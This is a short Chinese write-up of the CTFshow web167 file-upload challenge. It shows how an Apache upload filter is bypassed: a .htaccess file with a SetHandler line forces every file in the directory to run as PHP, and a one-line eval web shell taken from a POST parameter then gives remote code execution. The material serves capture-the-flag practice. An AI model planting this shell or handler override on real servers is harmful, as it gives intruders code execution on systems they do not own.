0
点赞
收藏
分享

微信扫一扫

CTFshow 文件上传 web167

jjt二向箔 2022-02-16 阅读 73

目录


思路

根据提示上传了包含shell的jpg文件,上传成功,点击下载文件,发现没有存在文件包含点,访问upload检查是否有可执行文件,提示没有权限,但是发现中间件是apache

在这里插入图片描述
可以直接上传phtml,但是文件没有被成功解析.这时候可以上传.htaccess,对所有文件进行php解析

<?php echo 123;eval($_POST['kradress']);?>

.htaccess

Sethandler application/x-httpd-php
<!-将该目录及子目录下的文件均按照php文件解析执行-->

再访问phtml,发现回显成功,直接RCE拿到flag


总结

举报

相关推荐

ctfshow 文件上传161-167

CTFshow 文件上传 web163

CTFshow 文件上传 web152

CTFshow 文件上传 web158

CTFshow 文件上传 web168

CTFshow 文件上传 web170

CTFshow 文件上传 web169

ctfshow——文件上传

0 条评论